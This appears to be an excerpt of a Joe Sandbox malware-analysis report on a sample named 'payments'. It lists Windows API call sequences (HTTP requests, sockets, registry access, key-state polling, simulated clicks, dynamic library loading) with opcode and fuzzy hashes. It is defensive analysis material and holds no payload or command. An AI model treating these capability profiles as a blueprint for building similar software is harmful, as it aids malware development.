                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1951874230-3916222277
                                                                                                                          • Opcode ID: febba3bf2c7bffb7061835f506a6d0b1858caceedc2fc28869303655ed09333a
                                                                                                                          • Instruction ID: 2aba9ce191c37040ab40468b6077355ec60ef8a12e752c2e761de40487822215
                                                                                                                          • Opcode Fuzzy Hash: febba3bf2c7bffb7061835f506a6d0b1858caceedc2fc28869303655ed09333a
                                                                                                                          • Instruction Fuzzy Hash: 222192B2600248BFE7159F56CC85EBFB6EDEB48758F10801AF605D2280EB648E05A770
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                            • Part of subcall function 00CAD17C: GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                            • Part of subcall function 00CAD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CF915C
                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00CF9163
                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CF9178
                                                                                                                          • DestroyWindow.USER32(?), ref: 00CF9180
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                          • String ID: SysAnimate32
                                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                                          • Opcode ID: 4aa2c10678b63c0eb5bd5a995141f60e636205e4fe6a9976ccf51fa71a851bde
                                                                                                                          • Instruction ID: e6c30519ad96cb4ccef980e86186e694db9832126880e84bade9ae7ae3b363b6
                                                                                                                          • Opcode Fuzzy Hash: 4aa2c10678b63c0eb5bd5a995141f60e636205e4fe6a9976ccf51fa71a851bde
                                                                                                                          • Instruction Fuzzy Hash: 64218E7160020ABBEF504E659C85FFE37ADEB99364F108628FA2592190C731DD52A761
                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00CD9588
                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD95B9
                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00CD95CB
                                                                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CD9605
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 524a448849615d99932370aca512260e33c8fba4a10ac89c16c2036ee87e8811
• Instruction ID: c2c61648848c9fb6fd8611e65090f478f9e3a9e0d7d64772547b248581d0805e
• Opcode Fuzzy Hash: 524a448849615d99932370aca512260e33c8fba4a10ac89c16c2036ee87e8811
• Instruction Fuzzy Hash: B0214F78600305ABDB219F25EC45A9A77A4EF55724F204B2AFAA1D73E0E770DA45CB20
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00CD9653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD9683
• GetStdHandle.KERNEL32(000000F6), ref: 00CD9694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CD96CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 0d43361e9c5fa99a4916cd017df8f6ad9076e7e0ddf68c2ea0b37193bd594775
• Instruction ID: 0a103b2e1d8f981dc331e58962e55345d01874b62dcbe9adcc06396daa6eab04
• Opcode Fuzzy Hash: 0d43361e9c5fa99a4916cd017df8f6ad9076e7e0ddf68c2ea0b37193bd594775
• Instruction Fuzzy Hash: E621A479600305ABDB609F699C44E9E77E8EF45724F204A5AFAB1D33D0EB70D942CB20
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00CDDB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CDDB5E
• __swprintf.LIBCMT ref: 00CDDB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00D2DC00), ref: 00CDDBB5
Strings
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: e42a05a65f36b96730b2fb2748a9adb81038824159469d97b6ac83f88f197429
• Instruction ID: e2cfa4616e314572c3d4fb374fff38af3001f5c336f094c0c866a02e27b79d88
• Opcode Fuzzy Hash: e42a05a65f36b96730b2fb2748a9adb81038824159469d97b6ac83f88f197429
• Instruction Fuzzy Hash: 65217135A00208AFCB10EFA4DD85DEEB7B9EF49704B114069F605E7351DB71EA41DB60
APIs
  • Part of subcall function 00CCC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCC84A
  • Part of subcall function 00CCC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCC85D
  • Part of subcall function 00CCC82D: GetCurrentThreadId.KERNEL32 ref: 00CCC864
  • Part of subcall function 00CCC82D: AttachThreadInput.USER32(00000000), ref: 00CCC86B
• GetFocus.USER32 ref: 00CCCA05
  • Part of subcall function 00CCC876: GetParent.USER32(?), ref: 00CCC884
• GetClassNameW.USER32(?,?,00000100), ref: 00CCCA4E
• EnumChildWindows.USER32(?,00CCCAC4), ref: 00CCCA76
• __swprintf.LIBCMT ref: 00CCCA90
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
• String ID: %s%d
• API String ID: 3187004680-1110647743
• Opcode ID: c5b1c9ae33da7856176530e4d828d08a8f0dfcd884be9450243a0eb2f30797af
• Instruction ID: 941bf3dc9c39f42017039aa53dbafdd0125094d4ee2b60b1cd05763255e329cb
• Opcode Fuzzy Hash: c5b1c9ae33da7856176530e4d828d08a8f0dfcd884be9450243a0eb2f30797af
• Instruction Fuzzy Hash: 151172715002097BDF11BF60DCC9FEA3769AB54714F00806AFE1CAA186CF709546EB70
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
• GetStockObject.GDI32(00000011), ref: 00CAD1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
Strings
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID: @U=u
• API String ID: 3970641297-2594219639
• Opcode ID: 235687dec8d44d47ff34bc9d14fe783335513f2572c2d9af92dab28aa21aa594
• Instruction ID: cab8cd8a48df157fcd5984807a0e181aa7b562be939c60552fec5071a96531cc
• Opcode Fuzzy Hash: 235687dec8d44d47ff34bc9d14fe783335513f2572c2d9af92dab28aa21aa594
• Instruction Fuzzy Hash: 5211617250160ABFEF114F90DC54EEE7B6AFF0A368F044115FB1692150CB319E61DBA0
APIs
  • Part of subcall function 00CB7A0D: __getptd_noexit.LIBCMT ref: 00CB7A0E
• __lock.LIBCMT ref: 00CB748F
• InterlockedDecrement.KERNEL32(?), ref: 00CB74AC
• _free.LIBCMT ref: 00CB74BF
• InterlockedIncrement.KERNEL32(00E83030), ref: 00CB74D7
Strings
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID: 00
• API String ID: 2704283638-3810221537
• Opcode ID: fd1cea160631009316e393e8bac91de48a210fb94aa748e26f759da3ae2240e7
• Instruction ID: fb45d33694133bd6d44934507516b428e1db636d78f88054aa698a4fa7f75eeb
• Opcode Fuzzy Hash: fd1cea160631009316e393e8bac91de48a210fb94aa748e26f759da3ae2240e7
• Instruction Fuzzy Hash: 9101D636945721ABD712AF6895097DDBB60BF45B12F144205FC24A7790CB345E01EFE2
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CF19F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CF1A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CF1B49
• CloseHandle.KERNEL32(?), ref: 00CF1BBF
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: 584522baf158bb917a1f132b182f8f373ebf111fddaf4e26c1973d391312e929
• Instruction ID: 2dc49ab37377e173dad78398af7e610ec59758f1d480b1d9aab36c2311b29ef3
• Opcode Fuzzy Hash: 584522baf158bb917a1f132b182f8f373ebf111fddaf4e26c1973d391312e929
• Instruction Fuzzy Hash: A581A4B0600215EBDF10EFA4C886BADBBE5EF04724F088459FD15AF382D7B5A941DB91
APIs
• VariantInit.OLEAUT32(?), ref: 00CD1CB4
• VariantClear.OLEAUT32(00000013), ref: 00CD1D26
• VariantClear.OLEAUT32(00000000), ref: 00CD1D81
• VariantClear.OLEAUT32(?), ref: 00CD1DF8
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CD1E26
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 51ce1c2ca816fd168b20a873552005bd3124da28ae9d2c1c316e4032b40394fb
• Instruction ID: bbff33278426b4e7fbceed1b48c03e4ad875a772a838913e3b5795894526ae6e
• Opcode Fuzzy Hash: 51ce1c2ca816fd168b20a873552005bd3124da28ae9d2c1c316e4032b40394fb
• Instruction Fuzzy Hash: 6A5139B5A00249AFDB14CF58C884AAAB7F9FF4C314B15855AEE59DB301D730EA51CBA0
APIs
  • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
  • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CF06EE
• GetProcAddress.KERNEL32(00000000,?), ref: 00CF077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00CF079B
• GetProcAddress.KERNEL32(00000000,?), ref: 00CF07E1
• FreeLibrary.KERNEL32(00000000,00000004), ref: 00CF07FB
  • Part of subcall function 00CAE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDA574,?,?,00000000,00000008), ref: 00CAE675
  • Part of subcall function 00CAE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDA574,?,?,00000000,00000008), ref: 00CAE699
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 327935632-0
                                                                                                                          • Opcode ID: 39403774ee80b5a917d78dc565b00aa731c0485e869ee99b80f39be4d21c6ac9
                                                                                                                          • Instruction ID: 96bd0da603c5e15fe5b97a0fffebb6a5cbb75fef9945cceec1a973b5bf50e886
                                                                                                                          • Opcode Fuzzy Hash: 39403774ee80b5a917d78dc565b00aa731c0485e869ee99b80f39be4d21c6ac9
                                                                                                                          • Instruction Fuzzy Hash: CE515C75A00209EFCF00EFA8C485DADB7B5BF49710B15809AEA16AB352DB30ED45DF91
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2EEF
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF2F2E
                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CF2F75
                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00CF2FA1
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF2FAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3740051246-0
                                                                                                                          • Opcode ID: 83e164f844e2fbe5094e02a5f0b24018712633393c16bff32c08aeb37ea124eb
                                                                                                                          • Instruction ID: d880ad7c5b6632fa6eb6bcc678c855d90fe402df9805fee522f799f6e3df53ce
                                                                                                                          • Opcode Fuzzy Hash: 83e164f844e2fbe5094e02a5f0b24018712633393c16bff32c08aeb37ea124eb
                                                                                                                          • Instruction Fuzzy Hash: DD515C71218204AFDB04EF94C895E6AB7F9FF88314F00881DF69597291DB30E905DB52
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CE12B4
                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CE12DD
                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CE131C
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CE1341
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CE1349
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1389676194-0
                                                                                                                          • Opcode ID: a77de85d18b52203d84a15eefd4753ce7802e8101e9f735cbe6c173592537b9d
                                                                                                                          • Instruction ID: aeeae8d8699e315941747ef154fed3bbb0e5d0ca239c881adc12aca051f60a36
                                                                                                                          • Opcode Fuzzy Hash: a77de85d18b52203d84a15eefd4753ce7802e8101e9f735cbe6c173592537b9d
                                                                                                                          • Instruction Fuzzy Hash: FB412D35A00605EFCF01EF65C9859AEBBF5FF08314B148099E91AAB361DB31ED11DB50
                                                                                                                          APIs
                                                                                                                          • GetCursorPos.USER32(000000FF), ref: 00CAB64F
                                                                                                                          • ScreenToClient.USER32(00000000,000000FF), ref: 00CAB66C
                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00CAB691
                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00CAB69F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4210589936-0
                                                                                                                          • Opcode ID: 00a95300bd2156992ac5b7ff8b3feadf0a9c349bd99b4ed4ca7085d682c68ea2
                                                                                                                          • Instruction ID: c0366363ccd0205b5c6107eb635b5792b48c7e014fd1b423aaab24c1de230e56
                                                                                                                          • Opcode Fuzzy Hash: 00a95300bd2156992ac5b7ff8b3feadf0a9c349bd99b4ed4ca7085d682c68ea2
                                                                                                                          • Instruction Fuzzy Hash: 0A41603550411ABFDF199F64C844AE9BB75FF06324F10831AF869962D1CB30AD54EFA1
                                                                                                                          APIs
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CCB369
                                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00CCB413
                                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CCB41B
                                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00CCB429
                                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CCB431
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3382505437-0
                                                                                                                          • Opcode ID: 86ee1a4c7d35abd2a976554849de04932cb0388f456f5e8332b0bedcddd103ff
                                                                                                                          • Instruction ID: 998bbd6170bdc0d01805d78044ce9c164f34a555bdd6aed8da83ecf981c73905
                                                                                                                          • Opcode Fuzzy Hash: 86ee1a4c7d35abd2a976554849de04932cb0388f456f5e8332b0bedcddd103ff
                                                                                                                          • Instruction Fuzzy Hash: 2A31BF71900359EBDB04CFA8D94EBDE7BB6EB04315F108229F921E62D1C7B09E55DB90
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C950E6: _wcsncpy.LIBCMT ref: 00C950FA
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,00CD60C3), ref: 00CD6369
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00CD60C3), ref: 00CD6374
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00CD60C3), ref: 00CD6388
                                                                                                                          • _wcsrchr.LIBCMT ref: 00CD63AA
                                                                                                                            • Part of subcall function 00CD6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00CD60C3), ref: 00CD63E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3633006590-0
                                                                                                                          • Opcode ID: e8407a29ec76205e5c17d92ec99338154cc0ccf5431c774883e1cdae31f81a73
                                                                                                                          • Instruction ID: 320e367540d8b85c38fed7c6f173e9204dc983e566277803af6588636e3bd778
                                                                                                                          • Opcode Fuzzy Hash: e8407a29ec76205e5c17d92ec99338154cc0ccf5431c774883e1cdae31f81a73
                                                                                                                          • Instruction Fuzzy Hash: D02108315043155BDB15EBB8AC42FEA33ACAF06360F10406BF265C32E1EF70DA81DA65
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CEA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CEA84E
                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CE8BD3
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8BE2
                                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00CE8BFE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3701255441-0
                                                                                                                          • Opcode ID: 9eb2f0a2ee9f52cf933ae2835aee9732139803bdf1ee3cb3ad4fb0b860eb4dfb
                                                                                                                          • Instruction ID: 67ceb1d711aa357f7acf9c64ca52a35097e61fb2000983024ca701825bae62fe
                                                                                                                          • Opcode Fuzzy Hash: 9eb2f0a2ee9f52cf933ae2835aee9732139803bdf1ee3cb3ad4fb0b860eb4dfb
                                                                                                                          • Instruction Fuzzy Hash: A721A131200214AFDB10AF68CC85BBD77A9AF49724F048459F916E73D2CF74AC068761
APIs
• IsWindow.USER32(00000000), ref: 00CE8441
• GetForegroundWindow.USER32 ref: 00CE8458
• GetDC.USER32(00000000), ref: 00CE8494
• GetPixel.GDI32(00000000,?,00000003), ref: 00CE84A0
• ReleaseDC.USER32(00000000,00000003), ref: 00CE84DB
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAAFE3
• SelectObject.GDI32(?,00000000), ref: 00CAAFF2
• BeginPath.GDI32(?), ref: 00CAB009
• SelectObject.GDI32(?,00000000), ref: 00CAB033
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• __calloc_crt.LIBCMT ref: 00CB21A9
• CreateThread.KERNEL32(?,?,00CB22DF,00000000,?,?), ref: 00CB21ED
• GetLastError.KERNEL32 ref: 00CB21F7
• _free.LIBCMT ref: 00CB2200
• __dosmaperr.LIBCMT ref: 00CB220B
  • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCABD7
